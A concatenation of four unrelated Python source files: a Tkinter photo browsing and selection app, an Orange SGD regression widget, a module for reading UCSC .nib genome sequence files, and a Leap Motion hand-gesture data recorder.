# Use a string var and anchor it to a text label. Any change to string var will
# be displayed by the text label.
self.textstring = StringVar()
self.photoindex = StringVar()
# Image load path
self.file_path_str = []
# Selected image list file path
self.out_file_path_str = []
# Setup a frame (child of master) to display buttons
self.frame = Frame (master)
# Show frame.
self.frame.pack()
# Setup a frame (child of Frame) to display image
self.imframe = Frame (self.frame, relief=SUNKEN)
# Show frame.
self.imframe.pack(side=BOTTOM)
# Setup a frame (child of imframe) to hold the go-to entry box
self.txtboxframe = Frame (self.imframe, relief=SUNKEN)
# Show frame.
self.txtboxframe.pack(side=BOTTOM)
# Setup buttons with actions triggering command=$$$ function.
self.loadbutton = Button (self.frame, text="LOAD", command=self.loadpic)
self.loadbutton.pack(side=LEFT)
self.firstbutton = Button (self.frame, text="FIRST", command=self.firstpic)
self.firstbutton.pack(side=LEFT)
self.lastbutton = Button (self.frame, text="LAST", command=self.lastpic)
self.lastbutton.pack(side=LEFT)
self.quitbutton = Button (self.frame, text="QUIT", command=self.quitprog)
self.quitbutton.pack(side=RIGHT)
self.selectbutton = Button (self.frame, text="SELECT", command=self.selectpic, height=10, width=10)
self.selectbutton.pack(side=LEFT)
self.nextbutton = Button (self.frame, text="NEXT", command=self.nextpic)
self.nextbutton.pack(side=LEFT)
self.previousbutton = Button (self.frame, text="PREVIOUS", command=self.previouspic)
self.previousbutton.pack(side=LEFT)
self.rotatebutton = Button (self.frame, text="ROTATE LEFT", command=self.rotatepicleft)
self.rotatebutton.pack(side=RIGHT)
self.rotatebutton = Button (self.frame, text="ROTATE RIGHT", command=self.rotatepicright)
self.rotatebutton.pack(side=RIGHT)
# Setup a text label to show the displayed image index and anchor it to a string var.
# self.txtlabel = Label (self.imframe, textvar=self.textstring)
# self.txtlabel.pack(side=BOTTOM)
# Set up a label with entry to take input for Go to a particular photo
self.gotolabel = Label (self.txtboxframe, textvar= self.textstring)
self.gotolabel.pack(side=RIGHT)
self.txtbox = Entry (self.txtboxframe, textvariable=self.photoindex, bd=1, width=4, justify=RIGHT)
self.txtbox.bind('<Return>', self.get)
self.txtbox.pack(side=LEFT)
# self.gotobutton = Button (self.frame, text="GO TO", command=self.gotopicture)
# self.gotobutton.pack(side=BOTTOM)
# Note that the default pic is un-rotated. Used to toggle thumbnail
# self.rotated = 0
# Quit button action.
def quitprog (self):
# If selected list is not empty, prompt user for location to save list of selected images & append to it.
if self.selected:
self.out_file_path_str = tkFileDialog.askdirectory (title='Choose target dir to store selected files')
if not self.out_file_path_str:
tkMessageBox.showerror ("Error", "Choose valid dir")
return
self.out_file_path_str = os.path.join (self.out_file_path_str, 'selected_photos.txt')
with open (self.out_file_path_str, "a") as f:
for n in self.selected:
f.write (n+"\n")
# Quit program.
self.frame.quit ()
# Select button action.
def selectpic (self):
# Handle error condition: No images loaded yet.
if (self.curimage is None):
tkMessageBox.showerror ("Error", "Load images first!")
return
# If selected, add to list if not previously added.
if self.selectbutton ["text"] == "SELECT":
if self.curimage not in self.selected:
self.selected.append (self.curimage)
self.selectbutton ["text"] = "UNSELECT"
else:
tkMessageBox.showwarning ("Warning", "Already selected!")
else:
self.selected.remove (self.curimage)
self.selectbutton ["text"] = "SELECT"
def showimage (self):
# if self.rotated:
# self.image.thumbnail ((648, 648), Image.ANTIALIAS)
# else:
# self.image.thumbnail ((648, 648), Image.ANTIALIAS)
self.image.thumbnail ((648, 648), Image.ANTIALIAS)
photo = ImageTk.PhotoImage (self.image)
self.imlabel = Label (self.imframe, image=photo, height=648, width=648)
self.imlabel.image = photo
self.imlabel.pack (side=BOTTOM)
if self.oldimlabel is not None:
self.oldimlabel.destroy ()
# Save a reference to image label (enables destroying to repaint)
self.oldimlabel = self.imlabel
def rotatepicleft (self):
if (self.curimage is None):
tkMessageBox.showerror ("Error", "Load images first!")
return
self.image = self.image.rotate (90, expand=True)
# self.rotated = self.rotated ^ 1
self.showimage ()
def rotatepicright (self):
if (self.curimage is None):
tkMessageBox.showerror ("Error", "Load images first!")
return
self.image = self.image.rotate (-90, expand=True)
# self.rotated = self.rotated ^ 1
self.showimage ()
def firstpic (self):
if (self.curimage is None):
tkMessageBox.showerror ("Error", "Load images first!")
return
# Go to the first image in the list
self.curimgidx = 0
self.curimage = self.loaded [self.curimgidx]
self.image = Image.open (str(self.curimage))
self.showimage ()
self.photoindex.set( str (self.curimgidx + 1))
if self.curimage not in self.selected:
self.selectbutton ["text"] = "SELECT"
else:
self.selectbutton ["text"] = "UNSELECT"
def lastpic (self):
if (self.curimage is None):
tkMessageBox.showerror ("Error", "Load images first!")
return
# Go to the last image in the list
self.curimgidx = self.loadedsize - 1
self.curimage = self.loaded [self.curimgidx]
self.image = Image.open (str(self.curimage))
self.showimage ()
self.photoindex.set( str (self.curimgidx + 1))
if self.curimage not in self.selected:
self.selectbutton ["text"] = "SELECT"
else:
self.selectbutton ["text"] = "UNSELECT"
def previouspic (self):
if (self.curimage is None):
tkMessageBox.showerror ("Error", "Load images first!")
return
# Check for valid bounds of image list.
if (self.curimgidx - 1 >= 0):
self.curimage = self.loaded [self.curimgidx - 1]
self.curimgidx = self.curimgidx - 1
self.image = Image.open (str(self.curimage))
self.showimage ()
self.photoindex.set( str (self.curimgidx + 1))
if self.curimage not in self.selected:
self.selectbutton ["text"] = "SELECT"
else:
self.selectbutton ["text"] = "UNSELECT"
else:
tkMessageBox.showwarning ("Warning", "No previous images")
return
def nextpic (self):
self.rotated = 0
if (self.curimage is None):
tkMessageBox.showerror ("Error", "Load images first!")
return
# Check for valid bounds of image list.
if (self.curimgidx + 1 < self.loadedsize):
self.curimage = self.loaded [self.curimgidx + 1]
self.curimgidx = self.curimgidx + 1
self.image = Image.open (str(self.curimage))
self.showimage ()
self.photoindex.set( str (self.curimgidx + 1))
if self.curimage not in self.selected:
self.selectbutton ["text"] = "SELECT"
else:
self.selectbutton ["text"] = "UNSELECT"
else:
tkMessageBox.showwarning ("Warning", "End of dir reached")
# Get the index of the picture to be shown
# Check if the image is there within bound
def get (self, event):
if not self.loaded:
tkMessageBox.showwarning ("Warning", "Load the directory using LOAD button before calling GO TO")
else:
gotoindex = event.widget.get()
#print gotoindex
if gotoindex.isdigit() :
index = int (gotoindex) - 1
#print int(gotoindex)
if ((index >= 0) and (index < self.loadedsize)):
self.curimage = self.loaded [index]
self.curimgidx = index
self.image = Image.open (str (self.curimage))
self.showimage()
self.photoindex.set (gotoindex)
if self.curimage not in self.selected:
self.selectbutton ["text"] = "SELECT"
else:
self.selectbutton ["text"] = "UNSELECT"
else:
tkMessageBox.showerror("Error", "Invalid Entry!")
else:
tkMessageBox.showerror("Error", "Invalid Entry!")
def loadpic (self):
self.file_path_str = tkFileDialog.askdirectory (title='Choose image dir')
if not self.file_path_str:
tkMessageBox.showerror ("Error", "Choose valid dir")
return
self.loaded = [os.path.join (self.file_path_str, f) for f in os.listdir (self.file_path_str) if (f.lower().endswith ('gif') or
f.lower().endswith ('bmp') or f.lower().endswith ('jpg') or
f.lower().endswith ('jpeg')) ]
self.loadedsize = len (self.loaded)
self.curimgidx = 0
if self.loadedsize == 0:
tkMessageBox.showwarning ("Warning", "Empty dir; no images")
else:
self.textstring.set ("/" + str (self.loadedsize));
self.photoindex.set(str(self.curimgidx + 1))
self.curimage = self.loaded [self.curimgidx]
self.image = Image.open (str (self.curimage))
self.showimage ()
tkMessageBox.showinfo ("Info", "Loaded %d images!" % self.loadedsize)
root = Tk()
root.wm_title ("Photo Manager")
app = App (root)
root.mainloop()
|
|
# -*- coding: utf-8 -*-
from PyQt4 import QtGui
from PyQt4.QtGui import QGridLayout, QLabel
from PyQt4.QtCore import Qt
import Orange.data
from Orange.regression import linear
from Orange.preprocess.preprocess import Preprocess
from Orange.widgets import widget, settings, gui
class OWSGDRegression(widget.OWWidget):
name = "Stochastic Gradient Descent"
description = "Stochastic Gradient Descent Regression."
icon = "icons/SGDRegression.svg"
inputs = [{"name": "Data",
"type": Orange.data.Table,
"handler": "set_data"},
{"name": "Preprocessor",
"type": Preprocess,
"handler": "set_preprocessor"}]
outputs = [{"name": "Learner",
"type": linear.SGDRegressionLearner},
{"name": "Predictor",
"type": linear.LinearModel}]
learner_name = settings.Setting("SGD Regression")
alpha = settings.Setting(0.0001)
#: epsilon parameter for the Huber and epsilon-insensitive losses
epsilon = settings.Setting(0.1)
eta0 = settings.Setting(0.01)
l1_ratio = settings.Setting(0.15)
power_t = settings.Setting(0.25)
n_iter = settings.Setting(5)
#: Loss function to be used
SqLoss, Huber, Epsilon_i, SqEpsilon_i = 0, 1, 2, 3
L1, L2, ElasticNet = 0, 1, 2
#: Selected loss function
loss_function = settings.Setting(SqLoss)
penalty_type = settings.Setting(L2)
InvScaling, Constant = 0, 1
learning_rate = settings.Setting(InvScaling)
want_main_area = False
def __init__(self, parent=None):
super().__init__(parent)
self.data = None
self.preprocessors = None
box = gui.widgetBox(self.controlArea, self.tr("Name"))
gui.lineEdit(box, self, "learner_name")
form = QGridLayout()
typebox = gui.radioButtonsInBox(
self.controlArea, self, "lossfunc", [],
orientation=form,
)
# Loss function control
box = gui.widgetBox(self.controlArea, self.tr("Loss function to be used"))
buttonbox = gui.radioButtonsInBox(
box, self, "loss_function",
btnLabels=["Squared loss",
"Huber",
"Epsilon insensitive",
"Squared Epsilon insensitive"],
callback=self._on_func_changed
)
parambox = gui.widgetBox(box, orientation="horizontal")
box = gui.widgetBox(self.controlArea, self.tr("Penalty"))
buttonbox = gui.radioButtonsInBox(
box, self, "penalty_type",
btnLabels=["Absolute norm (L1)",
"Euclidean norm (L2)",
"Elastic Net (both)"],
callback=self._on_penalty_changed
)
parambox = gui.widgetBox(box, orientation="horizontal")
box = gui.widgetBox(self.controlArea, self.tr("Learning rate"))
buttonbox = gui.radioButtonsInBox(
box, self, "learning_rate",
btnLabels=["Inverse scaling",
"Constant"],
callback=self._on_lrate_changed
)
box = gui.widgetBox(self.controlArea, self.tr("Constants"))
form = QtGui.QFormLayout()
form.setContentsMargins(0, 0, 0, 0)
box.layout().addLayout(form)
alpha = gui.doubleSpin(box, self, "alpha", 0.0, 10.0, step=0.0001)
form.addRow("Alpha:", alpha)
spin = gui.doubleSpin(box, self, "eta0", 0.0, 10, step=0.01)
form.addRow("Eta0:", spin)
epsilon = gui.doubleSpin(box, self, "epsilon", 0.0, 10.0, step=0.01)
form.addRow("Epsilon:", epsilon)
l1_ratio = gui.doubleSpin(box, self, "l1_ratio", 0.0, 10.0, step=0.01)
form.addRow("L1 ratio:", l1_ratio)
power_t = gui.doubleSpin(box, self, "power_t", 0.0, 10.0, step=0.01)
form.addRow("Power t:", power_t)
# Number of iterations control
box = gui.widgetBox(self.controlArea, "Number of iterations")
gui.doubleSpin(box, self, "n_iter", 0, 1e+6, step=1)
self._func_params = [epsilon]
self._penalty_params = [l1_ratio]
self._lrate_params = [power_t]
gui.button(self.controlArea, self, "&Apply",
callback=self.apply, default=True)
self.setSizePolicy(
QtGui.QSizePolicy(QtGui.QSizePolicy.Fixed,
QtGui.QSizePolicy.Fixed)
)
self.setMinimumWidth(300)
self._on_func_changed()
self.apply()
def set_data(self, data):
"""Set the input train data set."""
self.warning(0)
if data is not None:
if not isinstance(data.domain.class_var,
Orange.data.ContinuousVariable):
data = None
self.warning(0, "Data does not have a continuous class var")
self.data = data
if data is not None:
self.apply()
def set_preprocessor(self, preproc):
if preproc is None:
self.preprocessors = None
else:
self.preprocessors = (preproc,)
self.apply()
def apply(self):
loss = ["squared_loss", "huber", "epsilon_insensitive", "squared_epsilon_insensitive"][self.loss_function]
penalty = ["l1", "l2", "elasticnet"][self.penalty_type]
learning_rate = ["invscaling", "constant"][self.learning_rate]
common_args = dict(
loss=loss,
alpha=self.alpha,
epsilon=self.epsilon,
eta0=self.eta0,
l1_ratio=self.l1_ratio,
power_t=self.power_t,
penalty=penalty,
learning_rate=learning_rate,
n_iter=self.n_iter,
)
learner = linear.SGDRegressionLearner(
preprocessors=self.preprocessors, **common_args)
learner.name = self.learner_name
predictor = None
if self.data is not None:
predictor = learner(self.data)
predictor.name = self.learner_name
self.send("Learner", learner)
self.send("Predictor", predictor)
def _on_func_changed(self):
enabled = [[False], # squared loss
[True], # huber
[True], # epsilon insensitive
[True]] # squared epsilon insensitive
mask = enabled[self.loss_function]
for spin, enabled in zip(self._func_params, mask):
spin.setEnabled(enabled)
def _on_penalty_changed(self):
enabled = [[False], # l1
[False], # l2
[True]] # elasticnet
mask = enabled[self.penalty_type]
for spin, enabled in zip(self._penalty_params, mask):
spin.setEnabled(enabled)
def _on_lrate_changed(self):
enabled = [[True], # invscaling
[False]] # constant
mask = enabled[self.learning_rate]
for spin, enabled in zip(self._lrate_params, mask):
spin.setEnabled(enabled)
def main():
app = QtGui.QApplication([])
w = OWSGDRegression()
w.set_data(Orange.data.Table("housing"))
w.show()
return app.exec_()
if __name__ == "__main__":
import sys
sys.exit(main())
|
|
'''Functions and classes used to interface with .nib files as created by Jim
Kent's nibFrag and faToNib utilities.'''
import glob
import math
import os
import struct
import sys
import warnings
from cStringIO import StringIO
from collections import defaultdict as dd
from chipsequtil import reverse_complement, get_file_parts, BEDFile
# module fields
NOMASK,MASK,HARDMASK = range(3)
class NibException(Exception) : pass
def _nib_fd(nib) :
'''Returns filename and file descriptor for nib, detecting whether it is a \
path or fd appropriately'''
# check to see if nib is a file or a string
if isinstance(nib,file) :
nib_fn = nib.name
nib.seek(0)
nib_f = nib
elif isinstance(nib,str) :
nib_fn = nib
nib_f = open(nib,'rb')
else :
raise NibException('Incompatible .nib argument %s with type %s, needs to \
be either <type \'file\'> or <type \'str\'>'%(str(nib),type(nib)))
return nib_fn, nib_f
def get_nib(nib,start=0,end=-1,strand='+',mask=NOMASK,name=None,dbHeader=None,tbaHeader=None) :
'''Return a (header,sequence) tuple representing this nibFrag record'''
headers = get_nib_header_batch(nib,[(start,end,strand,name,dbHeader,tbaHeader),])
seqs = get_nib_seq_batch(nib,[(start,end,strand)],mask)
return headers[0], seqs[0]
def get_nib_batch(nib,queries,mask=NOMASK) :
'''Batch interface for fetching fasta records. Returns tuple of lists
(headers,sequences)'''
headers = get_nib_header_batch(nib,queries)
seqs = get_nib_seq_batch(nib,[x[:3] for x in queries],mask=mask)
return headers, seqs
def get_nib_seq(nib,start=0,end=-1,strand='+',mask=NOMASK) :
'''Extract subsequence from .nib file like Jim Kent's nibFrag utility.
Default behavior is to return the entire sequence.
Extract the nucleotide substring defined by the closed interval [start,end]
from the sequence found in *nib_fn*. *mask* parameter has the following
possible values:
chipsequtil.nib.NOMASK -- masked positions are not indicated (default)
chipsequtil.nib.MASK -- masked positions are lower case, unmasked bases capitalized
chipsequtil.nib.HARDMASK -- masked positions are replaced with Ns
'''
return get_nib_seq_batch(nib,[(start,end,strand)],mask)[0]
def get_nib_header(nib_fn,start=0,end=-1,strand='+',name=None,dbHeader=None,tbaHeader=None) :
'''Method for constructing fasta headers compliant with nibFrag utility'''
headers = get_nib_header_batch(nib_fn,[(start,end,strand,name,dbHeader,tbaHeader),])
return headers[0]
def get_nib_header_batch(nib,queries) :
'''Batch method for creating nibFrag headers. *queries* is a list of at most
6-tuples (start,end,strand,name,dbHeader,tbaHeader) representing queries as
specified by the original nibFrag utility. Only start, end, and strand
fields are required.'''
nib_path, nib_f = _nib_fd(nib)
nib_dir,nib_fn,nib_base,nib_ext = get_file_parts(nib_path)
nbases = validate_nib_file(nib)
headers = []
header_tmpl = '>%(name)s%(db)s\n'
for rec in queries :
# set some defaults if they are not supplied
rec = list(rec)
rec.extend([None]*(6-len(rec)))
start, end, strand, name, dbHeader, tbaHeader = rec
if end == -1 :
end = nbases
fields = {}
fields['name'] = nib_path+':%d-%d'%(start,end) if not name else name
fields['db'] = ''
if tbaHeader :
# ignored for some reason in nibFrag when tbaHeader supplied and dbHeader is not
fields['name'] = '' if not dbHeader else fields['name']
fields['db'] = '%s.%s:%d-%d of %d'%(tbaHeader,nib_base,start,end,nbases)
if dbHeader :
fields['db'] = ':%s.%s:%d-%d:%s:%d'%(dbHeader,nib_base,start,end,strand,nbases)
headers.append(header_tmpl%fields)
return headers
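# Example of the produced header (illustrative; path and sequence length are
# hypothetical): for nib='/data/chr1.nib' and the query (0, 100, '+') the
# header is '>/data/chr1.nib:0-100\n'; adding dbHeader='hg19' yields
# '>/data/chr1.nib:0-100:hg19.chr1:0-100:+:<nbases>\n'.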
def validate_nib_file(nib) :
'''Validate .nib file header, returning number of bases indicated if successful.
*nib* argument is either a filename or an open file object.
'''
nib_fn, nib_f = _nib_fd(nib)
# first 4 bytes are a nib file signature
#TODO - consider attempting to figure out byte order to make truly cross platform
def_sig = 0x6BE93D3A
sig = struct.unpack('=l',nib_f.read(4))[0]
if def_sig != sig :
raise NibException('Invalid nib file signature in %s, found %s, expected \
%s, perhaps the .nib file was not created on this platform?\n\nnibFrag style \
error: %s is not a good .nib file.'%(nib_fn,hex(sig),hex(def_sig),nib_fn))
# second 4 bytes are number of bases in sequence
nbases = struct.unpack('=l',nib_f.read(4))[0]
return nbases
def get_nib_seq_batch(nib,queries,mask=NOMASK) :
'''Extract subsequence from .nib file like Jim Kent's nibFrag utility.
Extract the nucleotide substrings defined by the closed intervals in *queries*
from the sequence found in *nib*. *nib* argument is either a filename or
an open file object. Entries in *queries* are 3-tuples defining (start,end,strand)
sequence coordinates. Sequences are returned in order in a list as
strings. *mask* parameter has the following possible values:
chipsequtil.nib.NOMASK -- masked positions are not indicated (default)
chipsequtil.nib.MASK -- masked positions are lower case, unmasked bases capitalized
chipsequtil.nib.HARDMASK -- masked positions are replaced with Ns
'''
nib_fn, nib_f = _nib_fd(nib)
nbases = validate_nib_file(nib_f)
# rest of file is sequence, with each nibble (4 bytes) being a base as \
# follows (from http://genome.ucsc.edu/FAQ/FAQformat.html#format8) :
#
# 0 - T
# 1 - C
# 2 - A
# 3 - G
# 4 - N
#
# The most significant bit in a nibble is set if the base is masked
trans_nuc = 'tcagn'
# start translating the nibbles into nucleotides
def trans_nib(nib) :
nuc = trans_nuc[nib&7]
mask_bit = nib & 8
if mask in [MASK,HARDMASK] and mask_bit == 0 :
return nuc.upper()
if mask == HARDMASK and mask_bit != 0 :
return 'N'
return nuc
headers = [] # stores headers
seqs = [] # stores sequences
# sort the coords so we can walk most efficiently through the file
queries.sort()
for start, end, strand in queries :
if start < 0 :
raise NibException('Received negative start coordinate, this may '\
'indicate a region on mitochondrial DNA that '\
'spans reference sequence start and end. This '\
'utility cannot handle these cases, aborting. '\
'Requested interval: %s (%d,%d)'%(nib_fn,start,end))
start, end = map(int,(start,end))
# end == -1 means caller wants entire sequence
if end == -1 :
end = nbases
if any([nbases < c for c in [start,end]]) :
raise NibException(('Requested slice (%(start)d,%(end)d) not compatible ' \
'with sequence of length %(nbases)d in %(nib_fn)s, aborting\n\nnibFrag '\
'style error: nib read past end of file (%(start)d %(end)d) in file: '\
'%(nib_fn)s')%{'start':start,'end':end,'nbases':nbases,'nib_fn':nib_fn})
# figure out how many bytes to read through
start_byte,rem_byte = start/2,start%2
# calculate where we need to move to in the file from the current location
# + 8 is from the 2*4 bytes header info in the .nib format
byte_offset = start_byte-nib_f.tell() + 8
nib_f.seek(byte_offset,1) # seek forward to the beginning byte from current location
seq_bytes,seq_rem_byte = int(math.ceil((end-start+rem_byte)/2.)),(end+1)%2
seq_bytes = nib_f.read(seq_bytes+seq_rem_byte)
# start translating the bytes
seq = StringIO() # we use StringIO because it is more efficient than concatenating strings
for c in seq_bytes :
c_byte = struct.unpack('=b',c)[0]
# higher nibble
c_nib = (c_byte & (15<<4))>>4
nuc = trans_nib(c_nib)
seq.write(nuc)
# lower nibble
c_nib = int(c_byte) & 15
nuc = trans_nib(c_nib)
seq.write(nuc)
# final nucleotide sequence
seq_str = seq.getvalue()
# if we're reading to the end, don't clip anything
if end != nbases :
# if the coordinate requested was not on a byte boundary, adjust
if rem_byte == 1 :
seq_str = seq_str[1:]
if seq_rem_byte == 1 :
seq_str = seq_str[:-1]
# nibFrag apparently uses zero-based indexing, clip off one base
seq_str = seq_str[:-1]
seq.close()
# adjust strand
if strand == '-' :
seq_str = reverse_complement(seq_str)
seqs.append(seq_str)
return seqs
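# Worked example of the nibble encoding above: a raw byte 0x12 packs two
# bases -- the high nibble 0x1 decodes to 'c' and the low nibble 0x2 to 'a'.
# With the mask bit set (e.g. 0x9A: high nibble 0x9, low nibble 0xA) both
# bases are flagged as masked, so under HARDMASK they are emitted as 'N'.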
class SeqDBException(Exception): pass
class NibDBException(Exception): pass
class SeqDB(object) :
'''Base class for different kinds of sequence databases. Does nothing,
implement subclasses. Constructor provides _db_map and db_info class members.'''
def __init__(self) :
self._db_map = {}
self.db_info = dd(dict)
def get_seq(self,*args, **kwargs) :
raise SeqDBException('Base class SeqDB has no get_seq implementation')
class NibDB(SeqDB) :
'''Class providing an interface to a set of .nib files as created by faToNib
in Jim Kent's software suite.
Sequences are identified by the basename of the .nib file without the .nib
extension, e.g. chr1.nib is identified as chr1.
Some potentially useful information about the entries in the database is
stored in the *nib_info* dictionary.
'''
def __init__(self,nib_fns=[],nib_dirs=[]) :
'''*nib_fns* is a list of paths to specific .nib files desired for the
NibDB. *nib_dirs* is a list of paths to directories containing .nib
files such that every .nib file in the directories is added to the NibDB.
Explicitly passed files take precedence over those found in directories
when sequence names collide.
'''
SeqDB.__init__(self)
# find all *.nib files in the directories passed
if isinstance(nib_dirs,str) : # user just provided single directory
nib_dirs = [nib_dirs]
dir_nibs = []
for d in nib_dirs :
dir_nibs.extend(glob.glob(os.path.join(d,'*.nib')))
if isinstance(nib_fns,str) :
nib_fns = [nib_fns]
# for each .nib found, add to db
# if there is a collision of names, those specified in files (not dirs)
# take precedence without warning
for fn in dir_nibs+nib_fns :
# open the nib file
nib_path,nib_fn,nib_base,nib_ext = get_file_parts(fn)
fn, nib_f = _nib_fd(fn)
self._db_map[nib_base] = nib_f
# store some info
self.db_info[nib_base]['path'] = fn
nbases = validate_nib_file(self._db_map[nib_base])
self.db_info[nib_base]['nbases'] = nbases
def __del__(self) :
'''import this
...Explicit is better than implicit...
'''
for nib_f in self._db_map.values() :
nib_f.close()
def _get_db_map(self,name) :
'''Gets appropriate file handle for the requested name, raises NibDBException
if it cannot be found'''
try :
return self._db_map[name]
except KeyError :
raise NibDBException('Sequence name %s not found in NibDB'%name)
def get_fasta(self,name,start=0,end=-1,strand='+',mask=NOMASK) :
'''Get the fasta record for the specified arguments, returns (header,sequence)
tuple.'''
nib_f = self._get_db_map(name)
return get_nib(nib_f,start,end,strand,mask)
def get_fasta_batch(self,recs,mask=NOMASK) :
'''Batch version of *get_fasta* method. *recs* is a list of lists/tuples
with (<chromo>,<start>,<end>,<strand>). Returns list of (header,sequence)
tuples in the same sequence as the input records.'''
# gather the records for each chromosome together
chrom_recs = dd(list)
for i,r in enumerate(recs) :
chrom_recs[r[0]].append((i,r)) # recs are (index,<tuple>)
# extract sequences
all_chrom_recs = []
for chrom, rec_list in chrom_recs.items() :
# sorted lists make sequence extraction efficient
rec_list.sort(key=lambda x: x[1][1]) # recs are (index,<tuple>)
# separate indexes from records, extract for this chromo
indexes, c_recs = zip(*rec_list)
# get_nib_batch requires list of (<start>,<end>,<strand>) tuples, remove
# chromo in first position
c_recs = [r[1:] for r in c_recs]
nib_f = self._get_db_map(chrom)
headers, seqs = get_nib_batch(nib_f,c_recs,mask)
# return the sequences to a (index,(header,sequence)) list
all_chrom_recs.extend(zip(indexes,zip(headers,seqs)))
# put the sequences back in the original order
all_chrom_recs.sort(key=lambda x: x[0]) # recs are (index,<tuple>) again
indexes, recs = zip(*all_chrom_recs)
return zip(*recs)
def get_fasta_from_bed(self,bed,mask=NOMASK) :
'''Accepts either a chipsequtil.BEDFile instance or a filename for a BED
file (used to construct a BEDFile instance) and returns the fasta
records for all records in order.'''
# determine if *bed* is a filename or a BEDFile
if isinstance(bed,str) : # filename
bed = BEDFile(bed)
# construct the records
recs = []
for rec in bed :
if rec['chrom'].lower().startswith('track') : # track line, skip
continue
recs.append((rec['chrom'],int(rec['chromStart']),int(rec['chromEnd']),rec['strand']))
return self.get_fasta_batch(recs,mask)
def get_seq(self,name,start=0,end=-1,strand='+',mask=NOMASK) :
'''Extract sequence from sequence *name*. Other arguments are passed
directly to *get_nib_seq* function.'''
nib_f = self._get_db_map(name)
return get_nib_seq(nib_f,start,end,strand,mask)
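# Usage sketch (illustrative; the directory path is hypothetical):
#
#   db = NibDB(nib_dirs=['/data/hg19_nib'])
#   header, seq = db.get_fasta('chr1', 0, 100, '+')
#   subseq = db.get_seq('chr1', 0, 100)
#
# get_fasta_from_bed() accepts a BEDFile instance or a BED filename and
# returns (headers, sequences) for all records in their original order.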
|
|
################################################################################
# Copyright (C) 2012-2013 Leap Motion, Inc. All rights reserved. #
# Leap Motion proprietary and confidential. Not for distribution. #
# Use subject to the terms of the Leap Motion SDK Agreement available at #
# https://developer.leapmotion.com/sdk_agreement, or another agreement #
# between Leap Motion and you, your company or other organization. #
################################################################################
from __future__ import division
import Leap, sys, thread, time
from Leap import CircleGesture, KeyTapGesture, ScreenTapGesture, SwipeGesture
import math
gesture = sys.argv[1]
outfile = open('data'+gesture+'.csv','wb')
finger_names = ['Thumb', 'Index', 'Middle', 'Ring', 'Pinky']
def calc_dist(p1,p2):
return math.sqrt((p2.x - p1.x) ** 2 +
(p2.y - p1.y) ** 2 +
(p2.z - p1.z) ** 2)
def getSpeed(p1):
return math.sqrt(p1.x**2 + p1.y**2 + p1.z**2)
class HandInformation(object):
def __init__(self,hand):
self.record_time = time.time()
# measure distances
self.palm_position = hand.palm_position
# print "Palm position:",self.palm_position/10
self.finger_positions = {}
# Get fingers
for finger in hand.fingers:
# create a dictionary for that finger type
self.finger_positions[finger.type] = {}
# get bones and save only the end of each bone
for b in range(0,4):
bone = finger.bone(b)
# save the position of the end joint of this bone
self.finger_positions[finger.type][b] = bone.next_joint
# print self.finger_positions
self.palm_to_fingers = {}
#now create all the matchings
for key in self.finger_positions:
for i in range(4):
self.palm_to_fingers[(key,i)] = calc_dist(self.palm_position,self.finger_positions[key][i])
if i==3:
print "Finger: ",key," bone ",i," end: ",self.finger_positions[key][i]," to palm:",self.palm_to_fingers[(key,i)]
self.finger_to_finger = {}
for i in range(5):
for j in [x for x in range(5) if x!=i]:
if ((j,i) in self.finger_to_finger.keys()):
continue
else:
self.finger_to_finger[(i,j)] = calc_dist(self.finger_positions[i][3],self.finger_positions[j][3])
print "Finger:",i," to finger:",j," distance is ",self.finger_to_finger[(i,j)]
self.palm_velocity = getSpeed(hand.palm_velocity)
print "Palm velocity: ",self.palm_velocity, " and direction is ",hand.direction
def __str__(self):
ret = str(self.palm_position)
ret += "," + str(self.palm_velocity) + ","
return ret
def getArray(self):
returnArray = []
returnArray.append(self.record_time)
returnArray.append(self.palm_velocity)
for i in range(5):
returnArray.append(self.palm_to_fingers[(i,3)])
for i in range(5):
for j in [x for x in range(5) if x!=i]:
if ((j,i) in self.finger_to_finger.keys()):
continue
else:
returnArray.append(self.finger_to_finger[(i,j)])
return returnArray
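# Note: getArray() returns 17 values per frame -- the capture timestamp, the
# palm speed, five palm-to-fingertip distances (end joint of bone 3 for
# Thumb..Pinky), and the ten unique pairwise fingertip distances. These rows
# are what on_frame() writes to the CSV file (cast to int there).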
class FPS(object):
def __init__(self):
self.frames = []
self.frames.append(time.time())
self.startTime = time.time()
def new(self):
if self.frames == []:
self.frames = [time.time()]
else:
self.frames.append(time.time())
now = time.time()
self.frames = [x for x in self.frames if x > (now-1)]
print "FPS: ",len(self.frames)
class SampleListener(Leap.Listener):
finger_names = ['Thumb', 'Index', 'Middle', 'Ring', 'Pinky']
bone_names = ['Metacarpal', 'Proximal', 'Intermediate', 'Distal']
state_names = ['STATE_INVALID', 'STATE_START', 'STATE_UPDATE', 'STATE_END']
def on_init(self, controller):
print "Initialized"
self.FPS1 = FPS()
def on_connect(self, controller):
print "Connected"
# Enable gestures
controller.enable_gesture(Leap.Gesture.TYPE_CIRCLE);
controller.enable_gesture(Leap.Gesture.TYPE_KEY_TAP);
controller.enable_gesture(Leap.Gesture.TYPE_SCREEN_TAP);
controller.enable_gesture(Leap.Gesture.TYPE_SWIPE);
def on_disconnect(self, controller):
# Note: not dispatched when running in a debugger.
print "Disconnected"
def on_exit(self, controller):
print "Exited"
def on_frame(self, controller):
self.FPS1.new()
time.sleep(0.02)
# Get the most recent frame and report some basic information
frame = controller.frame()
print "Frame id: %d, timestamp: %d, hands: %d, fingers: %d, tools: %d, gestures: %d" % (
frame.id, frame.timestamp, len(frame.hands), len(frame.fingers), len(frame.tools), len(frame.gestures()))
# Get hands
for hand in frame.hands:
if not hand.is_left:
h = HandInformation(hand)
resultStr = [int(x) for x in h.getArray()]
outfile.write(str(resultStr)[1:-1]+'\n')
def state_string(self, state):
if state == Leap.Gesture.STATE_START:
return "STATE_START"
if state == Leap.Gesture.STATE_UPDATE:
return "STATE_UPDATE"
if state == Leap.Gesture.STATE_STOP:
return "STATE_STOP"
if state == Leap.Gesture.STATE_INVALID:
return "STATE_INVALID"
def main():
# Create a sample listener and controller
print "READY?"
time.sleep(1)
print "3"
time.sleep(1)
print "2"
time.sleep(1)
print "1"
time.sleep(1)
listener = SampleListener()
controller = Leap.Controller()
# Have the sample listener receive events from the controller
controller.add_listener(listener)
# Keep this process running until Enter is pressed
print "Press Enter to quit..."
try:
sys.stdin.readline()
except KeyboardInterrupt:
pass
finally:
# Remove the sample listener when done
controller.remove_listener(listener)
if __name__ == "__main__":
main()
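# Illustrative note (not part of the original recorder): each CSV row written in
# on_frame() is the integer-truncated output of HandInformation.getArray(), i.e.
# [record_time, palm_speed, 5 palm-to-fingertip distances (thumb..pinky),
#  10 unordered fingertip-to-fingertip distances], 17 columns in total.
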